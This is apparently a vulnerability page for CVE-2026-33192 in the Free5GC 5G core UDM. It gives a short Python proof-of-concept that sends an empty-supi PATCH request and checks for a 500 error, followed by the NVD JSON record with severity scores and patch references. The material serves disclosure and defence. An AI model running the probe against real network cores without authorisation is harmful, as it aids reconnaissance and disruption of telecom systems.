CVE-2026-33192

#!/usr/bin/env python3 import requests # CVE-2026-33192 PoC: Free5GC UDM Improper Error Handling # Target: Free5GC UDM component < 1.4.2 # Description: Sending a PATCH request with an empty supi parameter triggers a 500 error instead of 400, # and the method is incorrectly translated to PUT internally. def check_vulnerability(target_url): # Standard UDM UE Context Management endpoint (example) # The supi parameter should be a valid IMSI or SUPI, here we send it empty. endpoint = "nudm-uecm/v1/ue-contexts/" full_url = f"{target_url.rstrip('/')}/{endpoint}" headers = { "Content-Type": "application/json", "Accept": "application/json" } # Payload data (can be empty or minimal) payload = {} try: print(f"[*] Sending request to: {full_url}") response = requests.patch(full_url, headers=headers, json=payload, verify=False, timeout=10) print(f"[*] Status Code: {response.status_code}") # Analysis if response.status_code == 500: print("[+] Vulnerability confirmed! Server returned 500 Internal Server Error for empty supi.") print("[+] This indicates the UDM is masking 400 Bad Request errors as 500 errors.") elif response.status_code == 400: print("[-] Server returned 400 Bad Request. The target may be patched or not vulnerable.") else: print(f"[?] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": # Replace with actual target IP/Hostname target = "http://127.0.0.1:29500" check_vulnerability(target)

{"cve": {"id": "CVE-2026-33192", "sourceIdentifier": "[email protected]", "published": "2026-03-20T09:16:16.230", "lastModified": "2026-03-23T18:32:46.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Free5GC is an open-source Linux Foundation project for 5th generation (5G) mobile core networks. In versions prior to 1.4.2, the UDM incorrectly converts a downstream 400 Bad Request (from UDR) into a 500 Internal Server Error when handling PATCH requests with an empty supi path parameter. Additionally, the UDM incorrectly translates the PATCH method to PUT when forwarding to UDR, indicating a deeper architectural issue. This leaks internal error handling behavior, making it difficult for clients to distinguish between client-side errors and server-side failures. The issue has been patched in version 1.4.2."}, {"lang": "es", "value": "Free5GC es un proyecto de código abierto de la Linux Foundation para redes centrales móviles de quinta generación (5G). En versiones anteriores a la 1.4.2, el UDM convierte incorrectamente un 400 Bad Request descendente (del UDR) en un 500 Internal Server Error al manejar solicitudes PATCH con un parámetro de ruta supi vacío. Además, el UDM traduce incorrectamente el método PATCH a PUT al reenviar al UDR, lo que indica un problema arquitectónico más profundo. Esto filtra el comportamiento interno de manejo de errores, dificultando a los clientes distinguir entre errores del lado del cliente y fallos del lado del servidor. El problema ha sido parcheado en la versión 1.4.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:free5gc:udm:*:*:*:*:*:go:*:*", "versionEndExcluding": "1.4.2", "matchCriteriaId": "C4C4212B-95F4-49DD-B6DA-F6DF4D8D7257"}]}]}], "references": [{"url": "https://github.com/free5gc/free5gc/issues/784", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-5rvc-5cwx-g5x8", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/free5gc/udm/pull/79", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}